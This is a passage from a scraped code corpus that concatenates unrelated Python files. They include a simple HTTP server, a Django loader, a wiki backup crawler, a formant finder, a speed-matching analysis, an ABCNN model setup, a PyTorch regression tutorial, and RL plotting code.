            client_date= time.strptime(clientDate, "%a, %d %b %Y %H:%M:%S %Z\r\n")
            if(client_date<file_date):
                #print("file was updated ")
                HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"Content-Length: "+str(bodyLen)+"\r\n"+"Content-Type: text/html; charset=UTF-8\r\n"+"\r\n"+body
            else:
                #print("file was not updated")
                statusCode= 304
                statusPhr= "Not Modified"
                HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"\r\n"
        else:
            # Plain GET: return the file with standard headers.
            HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"Content-Length: "+str(bodyLen)+"\r\n"+"Content-Type: text/html; charset=UTF-8\r\n"+"\r\n"+body
    except IOError:
        # Requested file does not exist: 404 with an empty body.
        HTTPresponce= version+" "+str(statusCode)+" "+statusPhr+" "+"\r\n"+"Date "+curDate+"\r\n"+"Content-Length: 0"+"\r\n"+"\r\n"
    # Echo back to client
    connectionSocket.send(HTTPresponce.encode())
b2e782f665ad3a7c1e1d553fedf085f00ceaa078 | Python | wlowry88/ml_side_project | /scripts/load_albums.py | UTF-8 | 823 | 2.640625 | 3 | [] | no_license | import sys, os
from os.path import realpath, join, dirname
import pandas as pd
sys.path.insert(0, join(dirname(realpath(__file__)),'../'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ml_project.settings")
import django
django.setup()
from reviews.models import Album
def save_album_from_row(album_row):
album = Album()
album.id = album_row[0]
album.name = album_row[1]
album.save()
if __name__ == "__main__":
if len(sys.argv) == 2:
print "Reading from file " + str(sys.argv[1])
albums_df = pd.read_csv(sys.argv[1])
print albums_df
albums_df.apply(
save_album_from_row,
axis=1
)
print "There are {} albums".format(Album.objects.count())
else:
print "Please, provide Album file path"
| true |
a50176e3b2c3f4255dbb63fcf2580ee52c5ca150 | Python | NSLS-II-BMM/BMM-beamline-configuration | /wiki-backup/backup.py | UTF-8 | 2,529 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env python3
import re, requests, os
def download_file(url):
    """Stream `url` to a file in the current directory named after the
    last path segment of the URL, and return that filename.

    Raises requests.HTTPError for non-2xx responses.
    """
    target = url.split('/')[-1]
    # stream=True avoids loading the whole response into memory; the body
    # is copied to disk in fixed-size chunks instead.
    with requests.get(url, stream=True) as response:
        response.raise_for_status()
        with open(target, 'wb') as out:
            for block in response.iter_content(chunk_size=8192):
                out.write(block)
    return target
# Crawl the beamline wiki: fetch the main page, every linked wiki page,
# and every referenced media file, saving raw wikitext locally.
urlbase = 'https://wiki-nsls2.bnl.gov/beamline6BM/index.php/'
urlsuffix = '?action=raw'
pages = list()
media = list()
top = urlbase + 'Main_Page' + urlsuffix
#####################
# grab landing page #
#####################
print(f'fetching {top}')
download_file(top)
######################
# parse landing page #
######################
# Wiki links look like [[Target|Label]]; Media:/File: targets (and .ics
# calendar links) are media, everything else is a wiki page.
with open('Main_Page' + urlsuffix) as F:
    for line in F:
        z = re.search('\[\[(.*)\|(.*)\]\]', line)
        if z:
            if re.search('^(Media|File):', z.groups()[0]):
                media.append(z.groups()[0])
            elif re.search('ics$', z.groups()[0]):
                media.append(z.groups()[0])
            else:
                pages.append(z.groups()[0])
####################################
# download and parse every subpage #
####################################
# Subpages are only scanned for additional media, not for further pages.
for p in pages:
    this = urlbase + p + urlsuffix
    print(f'fetching {this}')
    download_file(this)
    with open(p + urlsuffix) as F:
        for line in F:
            z = re.search('\[\[(.*)\|(.*)\]\]', line)
            if z:
                if re.search('^(Media|File):', z.groups()[0]):
                    media.append(z.groups()[0])
                elif re.search('ics$', z.groups()[0]):
                    media.append(z.groups()[0])
                else:
                    continue
                #if z.groups()[0] not in pages:
                #    pages.append(z.groups()[0])
################################
# download all the media files #
################################
for m in media:
    mm = m
    # Strip any "|label" suffix from the media link.
    z = re.search('([^|]*)\|(.*)', m)
    if z:
        mm = z.groups()[0]
    this = urlbase + mm
    print(f'fetching {this}')
    download_file(this)
    ## that was actually an HTML file, use this
    ## simple heuristic to find url for actual media file
    with open(mm) as html:
        for line in html:
            z = re.search('fullMedia"><a href="([^"]*)"', line)
            if z:
                thing = 'https://wiki-nsls2.bnl.gov/' + z.groups()[0]
                print(f'\tfetching {thing}')
                download_file(thing)
    # Remove the intermediate HTML description page.
    os.remove(mm)
| true |
94aa6f67a9bdb8e5a15aa11fb582d88056dfbfd9 | Python | BToss/LanguageAcquisitionApp | /formant_finder.py | UTF-8 | 1,887 | 2.84375 | 3 | [] | no_license | #TODO: translate from python to java
#Step 1 Person produces vowel as input and is passed into Kiss FFT
#Step 2 is utilizing the c library Kiss FFT
#go here to get it: https://github.com/itdaniher/kissfft
#FT takes input and produces values
# AudioAnalyzer/app/src/main/jni/AudioAnalyzerHelperJNI.cpp
# The path above is to the windowing functions present in the AudioAnalyzer app. There isn't a Gaussian, but we can use their model
# to write one.
#output of 2 is passed into 3, file it as FFT result(see TODO below)
#Step 3 (The only written code currently): Extract important formants from spectra recived as output from step 2
# Number of spectral peaks (candidate formants) to extract.
formants_wanted = 6
#TODO: Set buffer zone to the expected width of a formant/2
buffer_zone = 1
#TODO: Replace fft_result with the input from your fft function.
fft_result = [2, 9, 5, 5, 1, 8, 5, 8, 2, 6, 5, 9, 10, 9, 2]
print("fft_result = " + str(fft_result))

formants = []
for _ in range(formants_wanted):
    # Find the index of the current global maximum of the spectrum.
    max_f = -1
    max_val = -1
    for f in range(len(fft_result)):
        if max_val < fft_result[f]:
            max_f = f
            max_val = fft_result[f]
    # Record max.
    formants.append(max_f)
    # Zero out the neighbourhood of the peak so it is not picked again.
    # BUG FIX: the original indexed max_f - buffer_zone + k unguarded, which
    # wraps to index -1 (end of list) when the peak sits at position 0.
    for idx in range(max_f - buffer_zone, max_f + buffer_zone + 1):
        if 0 <= idx < len(fft_result):
            fft_result[idx] = 0

print("all formants found = " + str(formants))
# Keep formants F1-F3 (drop the lowest peak, ignore higher ones).
formants_we_care_about = sorted(formants)[1:4]
# BUG FIX: the original line ended in a stray "GH", a syntax error.
print("Formants we care about = " + str(formants_we_care_about))
#TODO: step 4(Bark Difference Metric): Normalizes the vowel formants so different speakers register the same vowels
#zi = (26.81/((1+1960)/Fi))-0.53 aaaaaannnnnd then the output of that, the x axis is z3-z2 and y axis is z3-z1
#Step 5 is plotting matrix on graph utilizing above
#Step 6 is synthesizing exemplar vowel measurements into "target areas" on graph (See Archetype Calculations)
| true |
9a98a30b6dc92c9f2d4754eed1fcfc81470b9f85 | Python | sebhoerl/map-matching | /06_analysis.py | UTF-8 | 1,965 | 2.8125 | 3 | [] | no_license | import numpy as np
import pickle
import matplotlib.pyplot as plt
from tqdm import tqdm
def analyze(matching, osm_data, tomtom_data, threshold, aggregator, aggregator_name):
    """Scatter-plot TomTom speeds against OSM speed limits for matched links,
    overlay the per-speed-limit aggregate with std-dev error bars, and save
    both the figure (PNG) and the aggregates (pickle) under output/.

    Args:
        matching: dict mapping tomtom link id -> osm link id.
        osm_data / tomtom_data: dicts of link records; index 3 is speed and
            index 2 is road class — assumed from usage, TODO confirm schema.
        threshold: matching threshold used only in output filenames/labels.
        aggregator: callable reducing a list of speeds (e.g. np.mean).
        aggregator_name: label used in the output filenames.
    """
    plt.figure()
    aggregated = {}
    n = 0
    for tomtom_id, osm_id in tqdm(matching.items()):
        osm_speed = osm_data[osm_id][3]
        tomtom_speed = tomtom_data[tomtom_id][3]
        # NOTE(review): the two *_class values below are read but never used.
        osm_class = osm_data[osm_id][2]
        tomtom_class = tomtom_data[tomtom_id][2]
        if osm_speed is not None and tomtom_speed is not None:
            osm_speed = float(osm_speed)
            plt.plot(osm_speed, tomtom_speed, 'kx', alpha = 0.5)
            # Group observed TomTom speeds by the OSM speed limit.
            if not osm_speed in aggregated:
                aggregated[osm_speed] = []
            aggregated[osm_speed].append(tomtom_speed)
            n += 1
    aggregates = { k : aggregator(aggregated[k]) for k in aggregated }
    sorted_keys = sorted(aggregates.keys())
    sorted_values = [aggregates[k] for k in sorted_keys]
    # Reference diagonal: TomTom speed equal to the speed limit.
    x = np.linspace(0, 120)
    plt.plot(x, x, 'b--')
    plt.errorbar(sorted_keys, sorted_values, yerr = [np.std(aggregated[k]) for k in sorted_keys], color = 'r', marker = "x")
    plt.xlabel("Speed Limit [km/h]")
    plt.ylabel("Average TomTom Offpeak Speed [km/h]")
    plt.title("Manually matched links with speed info: %d" % n)
    plt.grid()
    plt.savefig("output/speeds_%s_%d.png" % (aggregator_name, threshold))
    with open("output/speeds_%s_%d.p" % (aggregator_name, threshold), "wb+") as f:
        pickle.dump(aggregates, f)
    plt.close()
if __name__ == "__main__":
    # Load pre-pickled link data once, then analyze every matching threshold
    # with both mean and median aggregation.
    osm_data = pickle.load(open("data/osm.p", "rb"))
    tomtom_data = pickle.load(open("data/tomtom.p", "rb"))
    for threshold in (10, 20, 30, 40, 50, 60, 70, 80, 90, 100):
        matching = pickle.load(open("data/matching_%d.p" % threshold, "rb"))
        analyze(matching, osm_data, tomtom_data, threshold, np.mean, "mean")
        analyze(matching, osm_data, tomtom_data, threshold, np.median, "median")
| true |
53e0bb6842119c698bd384dfc26d0123d20a7558 | Python | vishrutkmr7/DailyPracticeProblemsDIP | /2023/01 January/db01272023.py | UTF-8 | 614 | 4.09375 | 4 | [
"MIT"
] | permissive | """
Given an integer array, nums, return the total number of integers within nums that have an even number of digits.
Ex: Given the following nums…
nums = [1, 12, 123], return 1 (12 is the only integer with an even number of digits).
Ex: Given the following nums…
nums = [1, 32, 3492, 23], return 3.
"""
class Solution:
    def findNumbers(self, nums: list[int]) -> int:
        """Count how many integers in `nums` have an even number of digits."""
        total = 0
        for value in nums:
            # The decimal digit count is the length of the string form.
            if len(str(value)) % 2 == 0:
                total += 1
        return total
# Test Cases
if __name__ == "__main__":
    solution = Solution()
    print(solution.findNumbers([1, 12, 123]))       # expected: 1
    print(solution.findNumbers([1, 32, 3492, 23]))  # expected: 3
| true |
2b3415ebe769894d19195d47c3c47f85b38a4be3 | Python | xldrx/text.mirror | /iPhone_Backup/location.py | UTF-8 | 1,662 | 2.515625 | 3 | [] | no_license | #! /usr/bin/env python -u
# coding=utf-8
from datetime import datetime
import dateutil.parser
import pytz
__author__ = 'xl'
import xml.etree.ElementTree as ET
namespaces = {
'': "http://www.opengis.net/kml/2.2",
'gx': "http://www.google.com/kml/ext/2.2",
'kml': "http://www.opengis.net/kml/2.2",
'atom': "http://www.w3.org/2005/Atom"
}
def load_history(filename="history-11-13-1982.kml"):
    """Parse the KML location-history file and return its root element."""
    return ET.parse(filename).getroot()
def read_locations(root):
    """Extract {date, location} records from a Google KML gx:Track element.

    The track children alternate <when> timestamps and <gx:coord> position
    strings; pairs are consumed starting at index 1.
    """
    ret = []
    # NOTE(review): `all` shadows the builtin of the same name.
    all = root.findall('kml:Document[1]/kml:Placemark[1]/gx:Track[1]/', namespaces=namespaces)
    i = 1
    while i < len(all):
        position = all[i + 1].text.split(' ')
        date = dateutil.parser.parse(all[i].text)
        record = {
            "date": date,
            # NOTE(review): map() is a lazy iterator in Python 3 — this
            # "location" can only be consumed once; confirm a list is not
            # expected by callers.
            "location": map(float, position)
        }
        ret.append(record)
        i += 2
    return ret
def get_location(date):
    """Return the most recent known location at most 4 hours before `date`,
    or None when no such record exists for that day."""
    global locations
    # Lazily build `locations` if init() has not populated it yet.
    # NOTE(review): this fallback does not define `locations_dict`, so the
    # loop below would still raise NameError if init() never ran; in
    # practice init() is called at import time, making this path dead code.
    try:
        locations
    except NameError:
        locations = read_locations(load_history())
    last_time = locations[0]['date']
    position = None
    for loc in locations_dict.get(date.date(), []):
        # Hours elapsed since the previously accepted record.
        period = (date - last_time).total_seconds() / 3600
        if date > loc['date'] and period <= 4:
            position = loc['location']
        last_time = loc['date']
    return position
def init():
    """Populate the module-level `locations` list and the `locations_dict`
    index that groups location records by calendar date."""
    global locations
    global locations_dict
    locations = read_locations(load_history())
    locations_dict = {}
    for loc in locations:
        date = loc['date'].date()
        # Group records by day for fast lookup in get_location().
        locations_dict[date] = locations_dict.get(date, [])
        locations_dict[date].append(loc)
init() | true |
7d170d3bb9f4ff8efceccc8e5639784fef55d749 | Python | billiecn/ABCNN | /src/setup.py | UTF-8 | 15,304 | 2.609375 | 3 | [] | no_license | # coding=utf-8
import numpy as np
import os
import pandas as pd
import re
import torch
import torch.nn as nn
import yaml
from gensim.models import KeyedVectors
from gensim.models import FastText
from nltk.corpus import stopwords
from tqdm import tqdm
from model.attention.abcnn1 import ABCNN1Attention
from model.attention.abcnn2 import ABCNN2Attention
from model.blocks.abcnn1 import ABCNN1Block
from model.blocks.abcnn2 import ABCNN2Block
from model.blocks.abcnn3 import ABCNN3Block
from model.blocks.bcnn import BCNNBlock
from model.convolution.conv import Convolution
from model.model import Model
from model.layers.layer import CNNLayer
from model.pooling.allap import AllAP
from model.pooling.widthap import WidthAP
class EmbeddingFormatError(Exception):
    """Raised when the configuration names an embedding format that the
    loader does not recognize."""
class BlockTypeError(Exception):
    """Raised when an unrecognized CNN block type is requested in the config."""
def read_config(config_path):
    """ Reads in the configuration file from the given path.

        Args:
            config_path: string
                The path to the YAML configuration file.

        Returns:
            config: dict
                Contains the information needed to initialize the
                datasets and model.
    """
    with open(config_path, "r") as stream:
        # safe_load: yaml.load() without an explicit Loader can construct
        # arbitrary Python objects and is a TypeError in PyYAML >= 6.0.
        config = yaml.safe_load(stream)
    return config
def setup(config):
    """ Handles all of the setup needed to run an ABCNN model.

        Args:
            config: dict
                Contains the information needed to initialize the datasets
                and model.

        Returns:
            features: dict
                Contains the feature maps for the query-query pairs in each
                dataset. The keys are the names of the datasets and the values
                are the Tensors storing the feature maps.
            labels: dict
                Contains the labels for the query-query pairs in each dataset.
                The keys are the names of the datasets and the values are the
                labels.
            model: Model
                The instantiated model.
    """
    # word2index is only needed to size/fill the embedding matrix; it is not
    # returned to the caller.
    features, labels, word2index = setup_datasets(config)
    embeddings = setup_embeddings(config, word2index)
    model = setup_model(config, embeddings)
    return features, labels, model
def setup_model(config, embeddings):
    """ Sets up the model for training/evaluation. The architecture extends
        the ABCNN paper by allowing multiple convolutional layers with
        different window sizes (computed in parallel, not in series).

        Args:
            config: dict
                Contains the information needed to setup the model.
            embeddings: nn.Embedding
                The embedding matrix for the model.

        Returns:
            model: Model
                The instantiated model.
    """
    print("Creating the ABCNN model...")
    embeddings_size = config["embeddings"]["size"]
    max_length = config["max_length"]
    use_all_layer_outputs = config["use_all_layer_outputs"]

    # Build every configured layer, collecting (layer, output_size) pairs.
    built = [setup_layer(max_length, layer_config)
             for layer_config in config["layers"]]
    layers = [layer for layer, _ in built]
    layer_sizes = [embeddings_size] + [size for _, size in built]

    # The FC layer sees both sequences (factor 2), over either every layer's
    # output or just the last one.
    relevant_sizes = layer_sizes if use_all_layer_outputs else layer_sizes[-1:]
    final_size = 2 * sum(relevant_sizes)

    model = Model(embeddings, layers, use_all_layer_outputs, final_size).float()
    model.apply(weights_init)
    return model
def setup_word_vectors(config):
    """ Loads the pre-trained word vectors. The word vector file can be in
        Word2Vec or FastText formats.

        Args:
            config: dict
                Contains the information needed to initialize the embeddings
                model (path, format, is_binary under config["embeddings"]).

        Returns:
            word_vectors: KeyedVectors, FastTextKeyedVectors, or None
                The pretrained word embeddings, or None when the embeddings
                path does not point to an existing file.

        Raises:
            EmbeddingFormatError: if the configured format is neither
                "word2vec" nor "fasttext".
    """
    embeddings_path = config["embeddings"]["path"]
    embeddings_format = config["embeddings"]["format"]
    is_binary = config["embeddings"]["is_binary"]

    # Load pre-trained word embeddings, if possible
    if os.path.isfile(embeddings_path):
        if embeddings_format == "word2vec":
            print("Loading Word2Vec word vectors from: {}".format(embeddings_path))
            return KeyedVectors.load_word2vec_format(embeddings_path, binary=is_binary)
        elif embeddings_format == "fasttext":
            print("Loading FastText word vectors from: {}".format(embeddings_path))
            # NOTE(review): load_fasttext_format is deprecated in newer gensim
            # in favor of gensim.models.fasttext.load_facebook_model.
            return FastText.load_fasttext_format(embeddings_path).wv
        else:
            # BUG FIX: previously raised `EmbeddingsFormatError`, a name that
            # does not exist (the class defined above is `EmbeddingFormatError`),
            # turning a config mistake into a NameError.
            raise EmbeddingFormatError
    return None
def setup_datasets(config):
    """ Converts the examples from the datasets into a machine-readable format
        useful for training.

        To ensure that all words have a word embedding associated to them, we
        should have text from ALL datasets (note: this is NOT peeking at the
        dataset... this is just to prevent the model from crashing/complaining
        when it sees a word that is OOV.) OOV words are assigned random word
        embeddings.

        Args:
            config: dict
                Contains the information needed to initialize the datasets
                (expects "max_length" and a "data_paths" name->csv mapping).

        Returns:
            features: dict of string to LongTensor
                Maps each dataset name to its tokenized examples.
            labels: dict of string to LongTensor
                Maps each dataset name to its labels.
            word2index: dict of string to int
                Maps each word to a unique integer ID; index 0 is reserved
                for the "<PAD>" token.
    """
    word2index = {"<PAD>": 0}
    question_cols = ["question1", "question2"]
    examples = {} # Contains the featurized examples for each dataset
    labels = {} # Contains the labels for each dataset
    # texts = {} # Contains the parsed text for each dataset

    # Process each dataset
    max_length = config["max_length"]
    data_paths = config["data_paths"]
    datasets = {name: pd.read_csv(path) for name, path in data_paths.items()}
    for name, dataset in datasets.items():
        # Process texts
        classes = []
        indexed_examples = []
        # parsed_texts = []
        num_examples = len(dataset)
        for index, example in tqdm(dataset.iterrows(), desc=name, total=num_examples):
            # Process each question separately
            index_map = []
            parsed_text = []
            for column in question_cols:
                # Parse and clean the text
                question = example[column]
                words = text_to_word_list(question)
                words = remove_stop_words(words)
                # Convert words to indices; unseen words grow the vocabulary.
                indexes = []
                for word in words:
                    # Update word-index lookup if necessary
                    if word not in word2index:
                        word2index[word] = len(word2index)
                    # Add the word's index to the list
                    indexes.append(word2index[word])
                # Truncate to max_length if necessary
                length = min(len(indexes), max_length)
                indexes = indexes[:length]
                words = words[:length]
                # Pad with index 0 ("<PAD>") up to max_length if necessary
                if length < max_length:
                    num_padding = max_length - length
                    indexes.extend([0] * num_padding)
                    words.extend(["<PAD>"] * num_padding)
                # Store parsed text and index tensors
                index_map.append(indexes)
                # parsed_text.append(words)
            # Store processed text and index tensor map and label
            classes.append(example["is_duplicate"])
            indexed_examples.append(index_map)
            # parsed_texts.append(parsed_text)
        # Save the processed result
        labels[name] = torch.LongTensor(classes)
        examples[name] = torch.LongTensor(indexed_examples)
        # texts[name] = parsed_texts
    return examples, labels, word2index
def setup_embeddings(config, word2index):
    """ Creates the embedding matrix from pre-trained word vectors (when
        available) plus small random vectors for OOV words.

        Args:
            config: dict
                Contains the information needed to initialize the embeddings.
            word2index: dict
                Maps words to indices in the embedding matrix.

        Returns
            embeddings: nn.Embedding
                The embedding matrix.
    """
    dim = config["embeddings"]["size"]
    # One extra row beyond the vocabulary size, matching the original layout;
    # row 0 is the padding vector and stays all-zero.
    matrix = np.random.uniform(-0.01, 0.01, (len(word2index) + 1, dim))
    matrix[0] = 0

    # Overwrite random rows with pre-trained vectors where available.
    pretrained = setup_word_vectors(config)
    if pretrained:
        for token, row in tqdm(word2index.items(), desc="embedding matrix"):
            if token in pretrained:
                matrix[row] = pretrained[token]

    return nn.Embedding.from_pretrained(torch.from_numpy(matrix))
def text_to_word_list(text):
    """ Preprocess and convert texts to a list of words. This code was adapted
        from Elior Cohen's MaLSTM code:
        https://github.com/eliorc/Medium/blob/master/MaLSTM.ipynb

        Args:
            text: string
                The text to parse.

        Returns:
            text: list of string
                The parsed text.
    """
    # Ordered (pattern, replacement) pairs; order matters, so this table is
    # applied strictly top to bottom.
    substitutions = (
        (r"[^A-Za-z0-9^,!.\/'+-=]", " "),
        (r"what's", "what is "),
        (r"\'s", " "),
        (r"\'ve", " have "),
        (r"can't", "cannot "),
        (r"n't", " not "),
        (r"i'm", "i am "),
        (r"\'re", " are "),
        (r"\'d", " would "),
        (r"\'ll", " will "),
        (r",", " "),
        (r"\.", " "),
        (r"!", " ! "),
        (r"\/", " "),
        (r"\^", " ^ "),
        (r"\+", " + "),
        (r"\-", " - "),
        (r"\=", " = "),
        (r"'", " "),
        (r"(\d+)(k)", r"\g<1>000"),
        (r":", " : "),
        (r" e g ", " eg "),
        (r" b g ", " bg "),
        (r" u s ", " american "),
        (r"\0s", "0"),
        (r" 9 11 ", "911"),
        (r"e - mail", "email"),
        (r"j k", "jk"),
        (r"\s{2,}", " "),
    )

    cleaned = str(text).lower()
    for pattern, replacement in substitutions:
        cleaned = re.sub(pattern, replacement, cleaned)
    return cleaned.split()
def remove_stop_words(words):
    """ Removes all English stop words (per NLTK's corpus).

        Args:
            words: list of string
                The words in the text.

        Returns:
            words: list of string
                The words in the text with stop words removed.
    """
    stop_set = set(stopwords.words("english"))
    return [word for word in words if word not in stop_set]
def setup_layer(max_length, layer_config):
    """ Creates a single Layer for the CNN model from its block configs.

        Args:
            max_length: int
                The maximum length of the input sequences.
            layer_config: dict
                Contains the information needed to create the layer.

        Returns:
            layer: Layer module
                The desired Layer module.
            layer_size: int
                Sum of the output sizes of the layer's blocks.
    """
    built = [setup_block(max_length, block_config)
             for block_config in layer_config]
    blocks = [block for block, _ in built]
    total_size = sum(size for _, size in built)
    return CNNLayer(blocks), total_size
def setup_block(max_length, block_config):
    """ Creates a single block for the CNN model.

        Args:
            max_length: int
                The maximum length for each sequence/question.
            block_config: dict
                Contains the information needed to create the block
                ("type", "input_size", "output_size", "width",
                "dropout_rate", "match_score", "share_weights").

        Returns:
            block: Block module
                The desired Block module.
            output_size: int
                The block's configured output size (echoed back for the
                caller's bookkeeping).

        Raises:
            BlockTypeError: if block_config["type"] is not one of
                "bcnn", "abcnn1", "abcnn2", "abcnn3".
    """
    input_size = block_config["input_size"]
    output_size = block_config["output_size"]
    width = block_config["width"]
    dropout_rate = block_config["dropout_rate"]
    match_score = block_config["match_score"]
    share_weights = block_config["share_weights"]
    # The four variants differ in whether attention is applied before the
    # convolution (abcnn1), after it (abcnn2), both (abcnn3), or not at all
    # (bcnn). The last Convolution argument (1 or 2) is the input channel
    # count: blocks with pre-conv attention feed 2 channels.
    if block_config["type"] == "bcnn":
        conv = Convolution(input_size, output_size, width, 1)
        pool = WidthAP(width)
        block = BCNNBlock(conv, pool, dropout_rate=dropout_rate)
    elif block_config["type"] == "abcnn1":
        attn = ABCNN1Attention(input_size, max_length, share_weights, match_score)
        conv = Convolution(input_size, output_size, width, 2)
        pool = WidthAP(width)
        block = ABCNN1Block(attn, conv, pool, dropout_rate=dropout_rate)
    elif block_config["type"] == "abcnn2":
        conv = Convolution(input_size, output_size, width, 1)
        attn = ABCNN2Attention(max_length, width, match_score)
        block = ABCNN2Block(conv, attn, dropout_rate=dropout_rate)
    elif block_config["type"] == "abcnn3":
        attn1 = ABCNN1Attention(input_size, max_length, share_weights, match_score)
        conv = Convolution(input_size, output_size, width, 2)
        attn2 = ABCNN2Attention(max_length, width, match_score)
        block = ABCNN3Block(attn1, conv, attn2, dropout_rate=dropout_rate)
    else:
        raise BlockTypeError
    return block, output_size
def weights_init(m):
    """ Initializes the weights for the modules in the CNN model. Applied
        recursively to all modules in the model via nn.Module.apply().

        Convolution/Linear modules get Xavier-normal weights and zero biases;
        ABCNN1Attention modules get Xavier-normal W1/W2 matrices.

        Args:
            m: nn.Module
                The module to initialize.

        Returns:
            None
    """
    name = type(m).__name__
    # Substring matching (not isinstance) mirrors the original behaviour.
    if "Conv2d" in name or "Linear" in name:
        nn.init.xavier_normal_(m.weight)
        nn.init.constant_(m.bias, 0)
    elif "ABCNN1Attention" in name:
        nn.init.xavier_normal_(m.W1)
        nn.init.xavier_normal_(m.W2)
| true |
a567a30ec426443d0f1467432af35094b65873e1 | Python | Reena-Kumari20/Nested_function | /hey.py | UTF-8 | 136 | 2.953125 | 3 | [] | no_license | def outerFunction(text):
def innerFunction():
print(text)
innerFunction()
text="Hey!"
outerFunction(text) | true |
1eaf7444da8cd36660c8d18025e42c612a439cad | Python | a-lchen/bluetoothLE | /beacons.py | UTF-8 | 1,861 | 2.90625 | 3 | [] | no_license | from bluetooth.ble import BeaconService
import triangulate
import pygame
from time import sleep
class Beacon(object):
    """Snapshot of a single BLE iBeacon advertisement.

    `data` is the (uuid, major, minor, tx_power, rssi) tuple produced by
    BeaconService.scan(); `address` is the device's MAC address.
    """

    def __init__(self, data, address):
        (self._uuid, self._major, self._minor,
         self._power, self._rssi) = data[0], data[1], data[2], data[3], data[4]
        self._address = address

    def __str__(self):
        template = ("Beacon: address:{ADDR} uuid:{UUID} major:{MAJOR}"
                    " minor:{MINOR} txpower:{POWER} rssi:{RSSI}")
        return template.format(ADDR=self._address, UUID=self._uuid,
                               MAJOR=self._major, MINOR=self._minor,
                               POWER=self._power, RSSI=self._rssi)
# One-time pygame setup: an 850x850 window with a white 800x800 canvas.
pygame.init()
screen = pygame.display.set_mode((850,850))
pygame.draw.rect(screen, (255,255,255), (25,25,800,800), 0)
# BUG FIX: `pygame.display.update` without parentheses was a no-op attribute
# access; it must be called to actually refresh the screen.
pygame.display.update()


def visualize(x, y):
    """Redraw the canvas and plot the (x, y) position, where x and y are in
    [0, 1] and are scaled onto the 400x400 inner box."""
    pygame.draw.rect(screen, (255,255,255), (25,25,800,800), 0)
    pygame.draw.rect(screen, (0,0,0), (225, 225, 400, 400), 1)
    pygame.draw.rect(screen, (0,0,0), ((x*400)+225,(y*400)+225,10,10), 0)
    # flip() refreshes the full display (the previous bare
    # `pygame.display.update` attribute access did nothing).
    pygame.display.flip()
# NOTE(review): this script mixes Python 2 print statements (below) with
# print() calls, so it only runs under Python 2.
service = BeaconService()
strength_history = []
while True:
    # One-second BLE scan; devices maps address -> advertisement tuple.
    devices = service.scan(1)
    strengths = []
    # Known beacon positions in normalised coordinates (two beacons expected).
    locs = [(0,0), (1,0)]
    for address, data in list(devices.items()):
        b = Beacon(data, address)
        print(b)
        print triangulate.strength_to_length(b._rssi)
        strengths.append(b._rssi)
    # Triangulation needs exactly one reading per beacon.
    if (len(strengths) != 2):
        continue
    strength_history.append(strengths)
    # Smooth by taking, per beacon, the strongest RSSI of the last 10 scans.
    recent = strength_history[-10:]
    best_strengths = []
    for i in range(len(strengths)):
        best_strengths.append(max([el[i] for el in recent]))
    print ("recents = " + str(recent) + " best: "+ str(best_strengths))
    loc = triangulate.triangulate(locs, best_strengths)
    if loc:
        print (loc)
        visualize(loc[0],loc[1])
# Unreachable: the while True loop above never breaks.
print("Done.")
f395e40c8b3cb67eb79fdce23b7ee76f528c37a7 | Python | shiyuli/LibTorchDemo | /Python/tutorials/regression.py | UTF-8 | 1,494 | 3.28125 | 3 | [
"MIT"
] | permissive | # encoding: utf-8
# using Python 3.7
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import matplotlib.pyplot as plt
# Build a toy regression dataset: y = x^2 plus uniform noise.
# torch.unsqueeze
x = torch.unsqueeze(torch.linspace(-1, 1, 100), dim=1) # x data (tensor), shape=(100, 1)
y = x.pow(2) + 0.2 * torch.rand(x.size()) # noisy y data (tensor), shape=(100, 1)
# NOTE(review): Variable is a legacy no-op wrapper in modern PyTorch (>=0.4);
# plain tensors work the same here.
x, y = Variable(x), Variable(y)

# plt.scatter(x.data.numpy(), y.data.numpy())
# plt.show()
class Net(torch.nn.Module):
    """Minimal one-hidden-layer MLP (Linear -> ReLU -> Linear) for regression."""

    def __init__(self, n_features, n_hidden_layer, n_output):
        super(Net, self).__init__()
        self.hidden_layer = torch.nn.Linear(n_features, n_hidden_layer)
        self.predict_layer = torch.nn.Linear(n_hidden_layer, n_output)

    def forward(self, x):
        hidden = F.relu(self.hidden_layer(x))
        return self.predict_layer(hidden)
net = Net(1, 10, 1)
print(net)

plt.ion() # realtime draw
plt.show()

optimizer = torch.optim.SGD(net.parameters(), lr=0.5) # lr: learning rate
loss_func = torch.nn.MSELoss()

# Standard training loop: forward, compute loss, backprop, step.
for t in range(100):
    prediction = net(x)
    loss = loss_func(prediction, y)

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    # Every 5 steps, redraw the data and the current fit.
    if t % 5 == 0:
        # plot and show learning process
        plt.cla()
        plt.scatter(x.data.numpy(), y.data.numpy())
        plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)
        plt.text(0.5, 0, 'Loss=%.4f' % loss.data.numpy(), fontdict={'size': 20, 'color': 'red'})
        plt.pause(0.1)

plt.ioff()
plt.show()
| true |
c400bfbae61d270014f8c788652f062952098a0e | Python | paulemms/Easy21Silver | /plots.py | UTF-8 | 4,745 | 2.84375 | 3 | [] | no_license | import pdb
import sys
import numpy as np
import matplotlib.pyplot as pyplot
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.cm as cm
import mc
import td
import fa
import environment as env
def standard_plots(num_episodes=100000):
    """Plot the value function and optimal policy for each algorithm.

    :param int num_episodes: Number of training episodes per algorithm.
    """
    # plot_value_policy draws its figures and returns None, so the previous
    # `*_model = plot_value_policy(...)` assignments only bound None under
    # misleading names; call for the side effect instead.
    plot_value_policy(mc.monte_carlo(num_episodes))
    plot_value_policy(td.sarsa0(num_episodes))
    plot_value_policy(td.sarsa(num_episodes, la=0.5))
    plot_value_policy(fa.lfa(num_episodes, la=0.0))
def plot_sarsa_lambda_mse(alg, title, num_episodes=10000):
    """
    Plot the MSE (vs. a long monte-carlo baseline) of SARSA with
    lambda = {0, 0.1, 0.2, ..., 1}.

    :param callable alg: Training algorithm, called as alg(num_episodes, la)
        and expected to return a model with a `final_q` array.
    :param str title: Plot title prefix.
    :param int num_episodes: Number of episodes for each SARSA run
    """
    pyplot.figure()
    lambdas = np.arange(0, 11) / 10
    # 100k monte-carlo episodes serve as the "exact" Q reference.
